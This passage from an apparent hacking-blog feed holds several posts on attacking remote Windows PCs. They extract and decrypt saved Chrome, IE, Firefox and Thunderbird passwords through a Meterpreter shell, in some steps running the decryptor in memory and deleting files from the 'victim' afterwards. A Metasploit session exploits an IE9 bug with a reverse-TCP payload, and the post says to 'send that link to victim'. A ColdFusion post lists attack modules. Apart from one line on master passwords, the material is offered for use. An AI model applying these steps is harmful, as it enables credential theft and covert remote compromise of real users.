Chrome stores all the sign-on secrets into the internal database file called &#39;Web data&#39; in the current user profile folder. Newer version has moved the login passwords related database into new file named &#39;Login Data&#39;.&amp;nbsp; DPAPI encrypts data based on either the DPAPI_SYSTEM values stored in LSA secrets or the user’s password, you can’t copy the database file to another machine and decrypt without using special tools as we did in case of mozilla.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
First download tool ChromePasswordDecryptor from &lt;a href=&quot;http://securityxploded.com/download.php#chromepassworddecryptor&quot; target=&quot;_blank&quot;&gt;here &lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Installed it in windows.We are only interested in windows binary which is located on C:\Program Files\SecurityXploded . So from that directory copy binary ChromePasswordDecryptor.exe to our main OS(Backtrack).&lt;br /&gt;
&lt;br /&gt;
We are going to use two method to extract saved passwords from browser.&lt;br /&gt;
&lt;br /&gt;
(A)In this method we are going to upload our binary to victim pc using meterpreter shell &amp;amp; then we execute it.&lt;br /&gt;
&lt;br /&gt;
(1)Get meterpreter shell.&lt;br /&gt;
&lt;br /&gt;
(2)Upload ChromePasswordDecryptor.exe (Which we copy into Backtract from windows) to victim.&lt;br /&gt;
&lt;br /&gt;
(3)Execute it from shell using following command.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ChromePasswordDecryptor.exe &quot;pwd.txt&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzA1eXXm8G7CNeVg2usN58_jLClPABETqDmV19zw3Coe14G46uWGUYT8QdjsX4xxeZJ-TjFRZdcA1f2EmjXBsfa6SySDamMngq2H3RW3j2ejS1AbM4B_MdcX_hn40jtrXbdld2y3mpjAJB/s1600/chrome-1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzA1eXXm8G7CNeVg2usN58_jLClPABETqDmV19zw3Coe14G46uWGUYT8QdjsX4xxeZJ-TjFRZdcA1f2EmjXBsfa6SySDamMngq2H3RW3j2ejS1AbM4B_MdcX_hn40jtrXbdld2y3mpjAJB/s1600/chrome-1.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
(4)Download pwd.txt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; download pwd.txt /root&lt;br /&gt;
&lt;br /&gt;
(5)Remove pwd.txt from victim &amp;amp; also remove uploaded binary&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rm ChromePasswordDecryptor.exe&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rm pwd.txt &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcQr8U8XOXdaGHPPv3zOGNXmfowcuUwfLz06lnXip2M7YsuxfzXtcOVJhzvHf5wx3J1uX8FYouCQQfv4jA7y4HFz9FbKKwW_eHG9WD5JkCM7QVFNX1YkHRgTx8WTfm2uCqj25kO21W_V-1/s1600/chrome-2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcQr8U8XOXdaGHPPv3zOGNXmfowcuUwfLz06lnXip2M7YsuxfzXtcOVJhzvHf5wx3J1uX8FYouCQQfv4jA7y4HFz9FbKKwW_eHG9WD5JkCM7QVFNX1YkHRgTx8WTfm2uCqj25kO21W_V-1/s1600/chrome-2.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
(B)In this method we are going to execute it in memory ; so we do not have to upload it to victim ; but we need system priv for this method.&lt;br /&gt;
&lt;br /&gt;
(1)Get meterpreter shell&lt;br /&gt;
&lt;br /&gt;
(2)Get system priv.&lt;br /&gt;
&lt;br /&gt;
(3)Change directory to C://windows\system32&lt;br /&gt;
&lt;br /&gt;
(4)Execute it in memory using following command&lt;br /&gt;
execute -H -m -d calc.exe -f ChromePasswordDecryptor.exe -a &quot;pwds.txt&quot;&lt;br /&gt;
&lt;br /&gt;
(5)download pwds.txt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; download pwds.txt /root&lt;br /&gt;
&lt;br /&gt;
(6)Remove pwds.txt from victim&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rm pwds.txt&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijsy92ASiDGBTjPqMw5xqmo7W6jCH176jR8a6XME5cz9Zgn9iGm7LIw0hUyLlOVsaIpyKjL17Au6Kna4zlHSMRMs53bMy213i1Hxas-FL53__tphDA1zrv7e8-8-VB-vMNTPuNVzmjR0K1/s1600/chrome-in-memory.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;276&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijsy92ASiDGBTjPqMw5xqmo7W6jCH176jR8a6XME5cz9Zgn9iGm7LIw0hUyLlOVsaIpyKjL17Au6Kna4zlHSMRMs53bMy213i1Hxas-FL53__tphDA1zrv7e8-8-VB-vMNTPuNVzmjR0K1/s400/chrome-in-memory.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
You can also used same method for IE also.Download file from &lt;a href=&quot;http://securityxploded.com/download.php#iepassworddecryptor&quot; target=&quot;_blank&quot;&gt;here .&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6aHAZ47Tv49aIOdJxY8W95lhbqxUYOws2zj_nrBLf6t0LSTG38RkN1aq6larwIvw0BXlP2i70i0tpZou3NzKhsPjz5KDlOYhlwdxPbP6NhlpbJJQag9MwlFUipy1mgo9J9RlHHDohXrui/s1600/ie-in-memory.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;275&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6aHAZ47Tv49aIOdJxY8W95lhbqxUYOws2zj_nrBLf6t0LSTG38RkN1aq6larwIvw0BXlP2i70i0tpZou3NzKhsPjz5KDlOYhlwdxPbP6NhlpbJJQag9MwlFUipy1mgo9J9RlHHDohXrui/s400/ie-in-memory.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/8876062821004453117/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/8876062821004453117'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/8876062821004453117'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html' title='Extract &amp; decrypt Chrome &amp; IE passwords from Remote PC'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzA1eXXm8G7CNeVg2usN58_jLClPABETqDmV19zw3Coe14G46uWGUYT8QdjsX4xxeZJ-TjFRZdcA1f2EmjXBsfa6SySDamMngq2H3RW3j2ejS1AbM4B_MdcX_hn40jtrXbdld2y3mpjAJB/s72-c/chrome-1.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-2317583630839640540</id><published>2013-09-17T13:53:00.001+05:30</published><updated>2013-09-17T14:01:40.263+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="post-exploitation"/><title type='text'>Extract &amp; decrypt passwords from Firefox &amp; Thunderbird.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Today we are going to extract password from Fireox &amp;amp; Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/extract-skype-firefox-data-after.html&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; that how to extract information from saved sqlite database of skype, firefox, chrome using python script.&lt;br /&gt;
&lt;br /&gt;
Most of the morden browser save information in sqlite format. When user enter login information ; firefox asked user to remember password.If user click on remember password then this passwords are saved into firefox database in signons.sqlite. But passwords are encrypted. so just by downloading signons.sqlite we can not extract passwords from it. Signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. Passwords in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well.&lt;br /&gt;
&lt;br /&gt;
Firefox Database path in windows:-&lt;br /&gt;
&lt;br /&gt;
[Windows XP]&lt;br /&gt;
C:\Documents and Settings\&amp;lt;user_name&amp;gt;\Application Data\Mozilla\Firefox\&amp;lt;random_name&amp;gt;.default&lt;br /&gt;
&lt;br /&gt;
[Windows Vista &amp;amp; Windows 7]&lt;br /&gt;
C:\Users\&amp;lt;user_name&amp;gt;\AppData\Roaming\Mozilla\Firefox\&amp;lt;random_name&amp;gt;.default&lt;br /&gt;
&lt;br /&gt;
Firefox Database path in linux &lt;br /&gt;
/root/.Mozilla/Firefox/Profile/&amp;lt;random_name&amp;gt;.default&lt;br /&gt;
&lt;br /&gt;
First we have to get meterpreter shell using any known vulnerability or using any &lt;a href=&quot;http://tipstrickshack.blogspot.com/search/label/metasploit/&quot; target=&quot;_blank&quot;&gt;metasploit method&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWsj1-Up8iycQqa4cHmJE-uqmEUSWAu9mNmdlp2_wz53bxBktHkhRGOvLYitOOaMCfZ32Lfa_OgBMV38wX_1bu-A-NdcSJnve7ZGkHFRCU9dPVU16IkNvpOu460mmmKdI1iukBpl6EWsd5/s1600/directory.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;download_creds&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWsj1-Up8iycQqa4cHmJE-uqmEUSWAu9mNmdlp2_wz53bxBktHkhRGOvLYitOOaMCfZ32Lfa_OgBMV38wX_1bu-A-NdcSJnve7ZGkHFRCU9dPVU16IkNvpOu460mmmKdI1iukBpl6EWsd5/s1600/directory.PNG&quot; title=&quot;download_creds&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Then we have to download three files from remote PC which are key3.db,signons.sqlite;cert8.db.You can use metasploit post module (use post/multi/gather/firefox_creds)for downloading this file or you can also download manually by browsing directory. &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmmzpWMQ3GA9XdCJ3-QxvxkWIahfjz_6MKoXFGUJJuOLQaYMudiuv01QubBn84pKaFNcQc3EiGrHuu3vYU6CxZnMFX28t9vElvVgVud9spVGu8bafhwPuCiDQQBL4Zwt9b2wconJhFetH/s1600/download.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;download_creds&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmmzpWMQ3GA9XdCJ3-QxvxkWIahfjz_6MKoXFGUJJuOLQaYMudiuv01QubBn84pKaFNcQc3EiGrHuu3vYU6CxZnMFX28t9vElvVgVud9spVGu8bafhwPuCiDQQBL4Zwt9b2wconJhFetH/s1600/download.PNG&quot; title=&quot;download_creds&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
Now we have database file as well as encryption key in key3.db. So now we have to decrypt it. I can not find any third party software to decrypt this passwords for linux platform.But i found one software which is working very well in windows.Download software from &lt;a href=&quot;http://securityxploded.com/download.php#thunderbirdpassdecryptor&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; . (It will work for both Firefox &amp;amp; thunderbird)&lt;br /&gt;
&lt;br /&gt;
(1)copy key3.db,signons.sqlite;cert8.db files in some folder which can be browse from windows.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ca-gBE2lNivy8kpbYb0abCcM76w9_jbTsWdMzQligx9PskC8iouYOwXp0yNVZ8S97-vRpTPsc1DvdX5yL0pjoR6Li_CSpxC8FKLYnp_tyXbMiU76J6eZ-zRAPzlKwAyz8DsNTYXDS9BQ/s1600/firefox_folder.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;mozilla_creds_decryption&quot; border=&quot;0&quot; height=&quot;156&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ca-gBE2lNivy8kpbYb0abCcM76w9_jbTsWdMzQligx9PskC8iouYOwXp0yNVZ8S97-vRpTPsc1DvdX5yL0pjoR6Li_CSpxC8FKLYnp_tyXbMiU76J6eZ-zRAPzlKwAyz8DsNTYXDS9BQ/s320/firefox_folder.PNG&quot; title=&quot;mozilla_creds_decryption&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
(2)Open windows.&lt;br /&gt;
(3)Install that software.&lt;br /&gt;
(4)Open it and Just specify firefox installed path &amp;amp; specify folder in which we copied downloaded file.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYNiU5NHuIrGTmV7U9dx9vNbfr9K0inZoxIlL8Y59DGHp9H4v3Bu5tjNCgHL4lT6rFsTbX4KoxnmXJ0uiKOIixjid0NnnqSDo78yKGJPIUyReq6AIsqehb6o3gVodOafCYlng9Axe8UWdW/s1600/password_decrypter.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;272&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYNiU5NHuIrGTmV7U9dx9vNbfr9K0inZoxIlL8Y59DGHp9H4v3Bu5tjNCgHL4lT6rFsTbX4KoxnmXJ0uiKOIixjid0NnnqSDo78yKGJPIUyReq6AIsqehb6o3gVodOafCYlng9Axe8UWdW/s320/password_decrypter.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
(5)click on Start recovery button.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqmQYqF-9YKdsIMN4FGjSDnOu8kbDq8WzoPS35wYQy989lyyWgFzUB0Kfcsx3GmfvPnQVEhBMgxXs7yfdduY2NE1D2y10CB0xQnH_YcCpbS8qEjA0xZ5qQlZRcmG3buVrqzACPv3e584GO/s1600/firefox_cred.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;decrypted_firefox_creds&quot; border=&quot;0&quot; height=&quot;276&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqmQYqF-9YKdsIMN4FGjSDnOu8kbDq8WzoPS35wYQy989lyyWgFzUB0Kfcsx3GmfvPnQVEhBMgxXs7yfdduY2NE1D2y10CB0xQnH_YcCpbS8qEjA0xZ5qQlZRcmG3buVrqzACPv3e584GO/s320/firefox_cred.PNG&quot; title=&quot;decrypted_firefox_creds&quot; width=&quot;320&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
Fireox &amp;amp; thunderbird use same encryption technique. So you can also get thunderbird password from above mention method. Just download key3.db,signons.sqlite;cert8.db files from thunderbird folder whose path are as follow&lt;br /&gt;
&lt;br /&gt;
[Windows XP]&lt;br /&gt;
C:\Documents and Settings\&amp;lt;user_name&amp;gt;\Application Data\Thunderbird\Profiles\&amp;lt;random_name&amp;gt;.default&lt;br /&gt;
&lt;br /&gt;
[Windows Vista &amp;amp; Windows 7]&lt;br /&gt;
C:\Users\&amp;lt;user_name&amp;gt;\AppData\Roaming\Thunderbird\Profiles\&amp;lt;random_name&amp;gt;.default&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvUUapP5vUw_C4zwI-XssjL_NYLJyzc8WsIxZBuveoqHPA-RIhcg17J1wdWjGYszl1gGHHyU7zDB4gUzOWARhjM9h8spusDi5Sv8NTCrAslhmfVKZ8ITpDc4OicSL8Hknv1mkSSTCtwMuC/s1600/thunderbird_pwd.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;decryption_thunderbird_creds&quot; border=&quot;0&quot; height=&quot;251&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvUUapP5vUw_C4zwI-XssjL_NYLJyzc8WsIxZBuveoqHPA-RIhcg17J1wdWjGYszl1gGHHyU7zDB4gUzOWARhjM9h8spusDi5Sv8NTCrAslhmfVKZ8ITpDc4OicSL8Hknv1mkSSTCtwMuC/s320/thunderbird_pwd.PNG&quot; title=&quot;decryption_thunderbird_creds&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
What is solution?&lt;br /&gt;
&lt;br /&gt;
If you set master password for firefox &amp;amp; thunderbird then without master password ; saved passwords can not be decrypted.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/2317583630839640540/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/2317583630839640540'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/2317583630839640540'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html' title='Extract &amp; decrypt passwords from Firefox &amp; Thunderbird.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWsj1-Up8iycQqa4cHmJE-uqmEUSWAu9mNmdlp2_wz53bxBktHkhRGOvLYitOOaMCfZ32Lfa_OgBMV38wX_1bu-A-NdcSJnve7ZGkHFRCU9dPVU16IkNvpOu460mmmKdI1iukBpl6EWsd5/s72-c/directory.PNG" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3273753881712621159</id><published>2013-09-11T18:49:00.000+05:30</published><updated>2013-09-11T18:52:03.573+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="coldfusion"/><title type='text'>Pentesting of coldfusion web-application.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
ColdFusion is a commercial rapid web application development platform.&lt;br /&gt;
&lt;b&gt;CFML = ColdFusion Markup Language&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
ColdFusion = Adobe’s product that handles CFML page/libs&lt;br /&gt;
– Runs on Windows, Solaris, HP/UX and Linux&lt;br /&gt;
– Apache, IIS, Jrun&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Following modules are Available in metasploit for coldfusion.&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; search coldfusion&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;auxiliary/gather/coldfusion_pwd_props&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;auxiliary/scanner/coldfusion_rds_check&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;auxiliary/scanner/http/cold_fusion_version&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;auxiliary/scanner/http/coldfusion_locale_traversal&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;exploit/windows/http/coldfusion_fckeditor&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Following documents are available for pentesting of coldfusion web-application&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf&quot; target=&quot;_blank&quot;&gt;ColdFusion for Penetration Testers&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;firstHeading&quot; id=&quot;firstHeading&quot; style=&quot;text-align: left;&quot;&gt;
&lt;a href=&quot;http://www.blackhatlibrary.net/Coldfusion_hacking&quot; target=&quot;_blank&quot;&gt;Coldfusion hacking&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.securiteam.com/tools/5ZP0B00FPG.html&quot; target=&quot;_blank&quot;&gt;ColdFusion Web Shell&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
If you have good document available for pentesting of coldfusion web-application ; please let me know. We will add it.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3273753881712621159/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/pentesting-of-coldfusion-web-application.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3273753881712621159'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3273753881712621159'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/pentesting-of-coldfusion-web-application.html' title='Pentesting of coldfusion web-application.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-5811482611310977082</id><published>2013-09-01T22:35:00.002+05:30</published><updated>2013-09-01T22:38:00.309+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Exploit for  IE 9 on Windows 7 SP1 </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version&amp;nbsp; 9.0.8112.16446&lt;br /&gt;
&lt;br /&gt;
Target&lt;br /&gt;
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/windows/browser/ms13_059_cflatmarkuppointer&lt;br /&gt;
&lt;br /&gt;
msf exploit(ms13_059_cflatmarkuppointer) &amp;gt; set srvhost 192.168.56.1&lt;br /&gt;
srvhost =&amp;gt; 192.168.56.1&lt;br /&gt;
msf exploit(ms13_059_cflatmarkuppointer) &amp;gt; set uripath /&lt;br /&gt;
uripath =&amp;gt; /&lt;br /&gt;
msf exploit(ms13_059_cflatmarkuppointer) &amp;gt; set lhost 192.168.56.1&lt;br /&gt;
lhost =&amp;gt; 192.168.56.1&lt;br /&gt;
msf exploit(ms13_059_cflatmarkuppointer) &amp;gt; set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
payload =&amp;gt; windows/meterpreter/reverse_tcp&lt;br /&gt;
msf exploit(ms13_059_cflatmarkuppointer) &amp;gt; run&lt;br /&gt;
[*] Exploit running as background job.&lt;br /&gt;
&lt;br /&gt;
[*] Started reverse handler on 192.168.56.1:4444 &lt;br /&gt;
msf exploit(ms13_059_cflatmarkuppointer) &amp;gt; [*] Using URL: http://192.168.56.1:8080/&lt;br /&gt;
[*] Server started.&lt;br /&gt;
&lt;br /&gt;
Now send that link to victim; as soon as he open link; you will get meterpreter shell.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7aicinAapaB0V-ZvAwa2S_ZozJME_Z6Gb_DEb1bOypkkh8ta4O1JyAzrIp4OUbxVZ7agAIPYfE8GDHYlfRAW5yOpGkP3_dE2tYmP8EVvV058gDZRFO1vQjSUOoD6QxrblZTVGk18AubBj/s1600/s.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;ie9-exploit&quot; border=&quot;0&quot; height=&quot;194&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7aicinAapaB0V-ZvAwa2S_ZozJME_Z6Gb_DEb1bOypkkh8ta4O1JyAzrIp4OUbxVZ7agAIPYfE8GDHYlfRAW5yOpGkP3_dE2tYmP8EVvV058gDZRFO1vQjSUOoD6QxrblZTVGk18AubBj/s320/s.jpeg&quot; title=&quot;ie9-exploit&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
